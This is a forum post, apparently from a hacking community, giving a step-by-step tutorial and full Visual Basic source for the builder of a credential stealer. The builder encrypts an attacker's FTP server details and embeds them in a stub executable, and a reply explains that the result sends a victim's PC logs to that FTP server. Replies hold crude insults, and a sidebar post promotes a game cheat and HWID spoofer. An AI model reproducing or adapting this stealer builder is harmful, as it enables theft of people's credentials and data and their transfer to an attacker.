Jump to content

Recommended Posts

Posted

How To Create A Stealer In VB 2008

 

Step 1)Download VB 2008 HERE or download VB 2010 Beta HERE

 

Step 2 )Create a Windows Forms Application and add the following:

  • Textbox1 - txtServer
  • Textbox2 - txtuser
  • Textbox3 - txtPW
  • Textbox4 - txtKey
  • Button1 - ButtenCompile
  • Button2 - ButtonClose
  • Button3 - ButtonRandom
  • Radiobutton1 - lblCryptString
  • Label1 - lblSever
  • Label2 - lblUser
  • Label3 - lblPW
  • SaveFileDialog1 - SaveFileDialog1

 

Step 3)Above Public Class Form1, put these imports:

 

Imports System.IO
Imports System.Security.Cryptography
Imports System.Text

 

Step 4)Under Public Class Form1, put this:

 

Dim Key As String, Server As String, User As String, Passwort As String

   Dim VB6setting As New Compatibility.VB6.FixedLengthString(500)

   Private Sub Zufall()
       For x = 1 To 20
           Dim Länge As Integer = 23

           Dim ret As String = String.Empty
           Dim SB As New System.Text.StringBuilder()
           Dim Content As String = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw!öäüÖÄÜß""§$%&/()=?*#-½¼»«©§ÆÖæåÔ¥¿ÿþûÛéçÑ"
           Dim rnd As New Random()
           For i As Integer = 0 To Länge - 1
               SB.Append(Content(rnd.[Next](Content.Length)))
           Next
           txtKey.Text = SB.ToString
       Next x
   End Sub

That will encrypt the FTP info.

 

Step 5)

Under Private Sub ButtenCompile_Click, insert this code:

 

      MsgBox("You did not enter key!", MsgBoxStyle.Exclamation, " Warning!")
           Exit Sub
       End If

       Key = txtKey.Text
       Server = txtServer.Text
       User = txtUser.Text
       Passwort = txtPW.Text

       Call CryptServer()

       With SaveFileDialog1
           .AddExtension = True
           .FileName = "Server"
           .Filter = "Executables (*.exe) | *.exe*"
           .ShowDialog()

           If File.Exists(.FileName) Then
               File.Delete(.FileName)
           End If

       End With

       Dim SchreibeDatei As New IO.BinaryWriter(New IO.FileStream(SaveFileDialog1.FileName & ".exe", IO.FileMode.Create))
       SchreibeDatei.Write(My.Resources.Stub)
       SchreibeDatei.Close()

       VB6setting.Value = Key & "_" & Server & "_" & User & "_" & Passwort

       FileOpen(1, (SaveFileDialog1.FileName & ".exe"), OpenMode.Binary)
       FilePutObject(1, VB6setting.Value, LOF(1) + 1)
       FileClose(1)

       MsgBox("The server was successfully created!", MsgBoxStyle.Information, "Success")

That will create the server.

 

Step 6)Under Private Sub ButtonRandom_Click, enter this code:

 

Call Zufall()

This will call the encryption for the FTP info.

 

Step 7)Under Private Sub Form1_Load, put this code:

 

Me.Activate()
       Call Zufall()
       My.Application.MinimumSplashScreenDisplayTime = 5000

Now, add this Sub. Put it anywhere, but not in any other Sub.

 

Protected Overrides Sub OnLoad(ByVal e As EventArgs)

       Me.Activate()

       MyBase.OnLoad(e)

   End Sub

 

Now, we will add three more Subs. This is the encryption that is used.

 

Private Sub CryptServer()
       Dim oAesProvider As New RijndaelManaged
       Dim btClear() As Byte

       Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

       Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

       oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
       oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

       Dim ms As New IO.MemoryStream
       Dim cs As New CryptoStream(ms, _
           oAesProvider.CreateEncryptor(), _
           CryptoStreamMode.Write)
       btClear = System.Text.Encoding.UTF8.GetBytes(Server)
       cs.Write(btClear, 0, btClear.Length)
       cs.Close()
       Server = Convert.ToBase64String(ms.ToArray)
       Call CryptUser()
   End Sub

   Private Sub CryptUser()
       Dim oAesProvider As New RijndaelManaged
       Dim btClear() As Byte

       Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

       Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

       oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
       oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

       Dim ms As New IO.MemoryStream
       Dim cs As New CryptoStream(ms, _
           oAesProvider.CreateEncryptor(), _
           CryptoStreamMode.Write)
       btClear = System.Text.Encoding.UTF8.GetBytes(User)
       cs.Write(btClear, 0, btClear.Length)
       cs.Close()
       User = Convert.ToBase64String(ms.ToArray)
       Call CryptPW()
   End Sub

   Private Sub CryptPW()
       Dim oAesProvider As New RijndaelManaged
       Dim btClear() As Byte

       Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

       Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

       oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
       oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

       Dim ms As New IO.MemoryStream
       Dim cs As New CryptoStream(ms, _
           oAesProvider.CreateEncryptor(), _
           CryptoStreamMode.Write)
       btClear = System.Text.Encoding.UTF8.GetBytes(Passwort)
       cs.Write(btClear, 0, btClear.Length)
       cs.Close()
       Passwort = Convert.ToBase64String(ms.ToArray)
   End Sub

 

For the closing, put this under Private Sub ButtonClose_Click:

 

If MsgBox("Do you want to really quit?", MsgBoxStyle.YesNo, "Exit") = MsgBoxResult.Yes Then
           End
       Else
           Exit Sub
       End If

 

Ok, here is the full code for the Builder:

 

Imports System.IO
Imports System.Security.Cryptography
Imports System.Text

Public Class form1

   Dim Key As String, Server As String, User As String, Passwort As String

   Dim VB6setting As New Compatibility.VB6.FixedLengthString(500)

   Private Sub Zufall()
       For x = 1 To 20
           Dim Länge As Integer = 23

           Dim ret As String = String.Empty
           Dim SB As New System.Text.StringBuilder()
           Dim Content As String = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw!öäüÖÄÜß""§$%&/()=?*#-½¼»«©§ÆÖæåÔ¥¿ÿþûÛéçÑ"
           Dim rnd As New Random()
           For i As Integer = 0 To Länge - 1
               SB.Append(Content(rnd.[Next](Content.Length)))
           Next
           txtKey.Text = SB.ToString
       Next x
   End Sub

   Private Sub ButtenCompile_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ButtenCompile.Click
       If txtServer.Text = Nothing Then
           MsgBox("You have not specified FTP server!", MsgBoxStyle.Exclamation, " Warning!")
           Exit Sub
       ElseIf txtUser.Text = Nothing Then
           MsgBox("You did not enter FTP user!", MsgBoxStyle.Exclamation, " Warning!")
           Exit Sub
       ElseIf txtPW.Text = Nothing Then
           MsgBox("You have not specified an FTP password", MsgBoxStyle.Exclamation, " Warning!")
           Exit Sub
       ElseIf txtKey.Text = Nothing Then
           MsgBox("You did not enter key!", MsgBoxStyle.Exclamation, " Warning!")
           Exit Sub
       End If

       Key = txtKey.Text
       Server = txtServer.Text
       User = txtUser.Text
       Passwort = txtPW.Text

       Call CryptServer()

       With SaveFileDialog1
           .AddExtension = True
           .FileName = "Server"
           .Filter = "Executables (*.exe) | *.exe*"
           .ShowDialog()

           If File.Exists(.FileName) Then
               File.Delete(.FileName)
           End If

       End With

       Dim SchreibeDatei As New IO.BinaryWriter(New IO.FileStream(SaveFileDialog1.FileName & ".exe", IO.FileMode.Create))
       SchreibeDatei.Write(My.Resources.Stub)
       SchreibeDatei.Close()

       VB6setting.Value = Key & "_" & Server & "_" & User & "_" & Passwort

       FileOpen(1, (SaveFileDialog1.FileName & ".exe"), OpenMode.Binary)
       FilePutObject(1, VB6setting.Value, LOF(1) + 1)
       FileClose(1)

       MsgBox("The server was successfully created!", MsgBoxStyle.Information, "Success")

   End Sub

   Private Sub ButtonRandom_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ButtonRandom.Click
       Call Zufall()
   End Sub

   Private Sub form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
       Me.Activate()
       Call Zufall()
       My.Application.MinimumSplashScreenDisplayTime = 5000


   End Sub
   Protected Overrides Sub OnLoad(ByVal e As EventArgs)

       Me.Activate()

       MyBase.OnLoad(e)

   End Sub


   Private Sub CryptServer()
       Dim oAesProvider As New RijndaelManaged
       Dim btClear() As Byte

       Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

       Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

       oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
       oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

       Dim ms As New IO.MemoryStream
       Dim cs As New CryptoStream(ms, _
           oAesProvider.CreateEncryptor(), _
           CryptoStreamMode.Write)
       btClear = System.Text.Encoding.UTF8.GetBytes(Server)
       cs.Write(btClear, 0, btClear.Length)
       cs.Close()
       Server = Convert.ToBase64String(ms.ToArray)
       Call CryptUser()
   End Sub

   Private Sub CryptUser()
       Dim oAesProvider As New RijndaelManaged
       Dim btClear() As Byte

       Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

       Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

       oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
       oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

       Dim ms As New IO.MemoryStream
       Dim cs As New CryptoStream(ms, _
           oAesProvider.CreateEncryptor(), _
           CryptoStreamMode.Write)
       btClear = System.Text.Encoding.UTF8.GetBytes(User)
       cs.Write(btClear, 0, btClear.Length)
       cs.Close()
       User = Convert.ToBase64String(ms.ToArray)
       Call CryptPW()
   End Sub

   Private Sub CryptPW()
       Dim oAesProvider As New RijndaelManaged
       Dim btClear() As Byte

       Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

       Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

       oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
       oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

       Dim ms As New IO.MemoryStream
       Dim cs As New CryptoStream(ms, _
           oAesProvider.CreateEncryptor(), _
           CryptoStreamMode.Write)
       btClear = System.Text.Encoding.UTF8.GetBytes(Passwort)
       cs.Write(btClear, 0, btClear.Length)
       cs.Close()
       Passwort = Convert.ToBase64String(ms.ToArray)
   End Sub

   Private Sub ButtonClose_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ButtonClose.Click

       If MsgBox("Do you want to really quit?", MsgBoxStyle.YesNo, "Exit") = MsgBoxResult.Yes Then
           End
       Else
           Exit Sub
       End If
   End Sub
End Class

 

You may need to add this dll

 

The stub's code is too long to be posted, so here is a download for it.

 

It's pretty basic, and open source.

 

Download Stub's Code

 

 

 

Credits : Sonix™

Posted

if its a stealer like istealer then u bind it in 1 file and when someones open it its send all the logs of his pc to an ftp wich u have puted . correct me if i am wrong

Posted

Totally nothing ;)

Tsouzei mounaki ???

apla alakse to onoma to KяaShi™ fteei

 

ante paliomalaka giati mou ta exeis kanei tsourekia.

eisai anikanos malaka.

epidei eisai Gold xerese?

 

SE GRAFW STA ARXIDIA MOU MALAKA

Posted

Tsouzei mounaki ???

apla alakse to onoma to KяaShi™ fteei

 

ante paliomalaka giati mou ta exeis kanei tsourekia.

eisai anikanos malaka.

epidei eisai Gold xerese?

 

SE GRAFW STA ARXIDIA MOU MALAKA

still not banned lol

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • Some new features that we added: - 2 new quests - PvP Arena (to get hero status) Olympiad is disabled - Love Event - Dressme for armor/weapons/accessories - HWID Protection - More monsters - New farm zone - New autofarm system (works almost like adrenaline) - Auto enchant - Auto augment - 3 levels of armors - 3 levels of weapons - Anti KS System - Rebirth Manager - 30 days checking rewards - Small event (daily checking with small reward for all online players)
    • Added FloodProtector utility to prevent packet flooding for actions like item use and dice rolling. Integrated flood protection checks in relevant client packet handlers and registered/removal hooks in player lifecycle. Updated movement logic in L2PcInstance for improved position synchronization and geodata handling. Minor fixes and refactoring in attack logic, private store handling, and admin NPC editing. Refactored AI classes to enhance movement, attack, and skill usage logic for characters and mobs. Improved distance checks, attack range calculations, and skill casting conditions. Removed unused intention command logic from L2CharacterAI. Updated configuration to enable CellPathFinding. Minor code cleanups and bug fixes for more reliable AI behavior. Enhanced GeoPathFinding with detailed debug and error messages for region loading, including success/failure counts and file checks. Refactored L2AttackableAI and L2CharacterAI to improve attack range tolerance, immediate attack behavior, and added safety checks for missing targets. Updated configuration to disable CellPathFinding by default and added a new ShowRedName option for aggressive mobs. Minor config and log updates included. Applied TCP socket optimizations (e.g., TCP_NODELAY, buffer sizes, keepalive) in ClientThread, Connection, and SelectorThread to reduce latency and improve throughput. Enhanced L2AttackableAI with better random walk, aggro, and attack logic, including silent move checks, quest monster handling, and improved faction/raid/minion behavior. Added silent move support to L2PlayableInstance and quest monster flag to L2NpcTemplate/L2NpcInstance. These changes aim to improve server responsiveness, AI realism, and overall stability.
    • I’ve been using this Escape from Tarkov Hack for about a week now with no issues at all. ESP works great without any lag, and the aimbot is smooth and doesn't feel obvious. Had a quick setup with the loader, and support answered my questions right away. The HWID spoofer also did its job without messing with my system. So far, the cheat's staying undetected on my side.
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock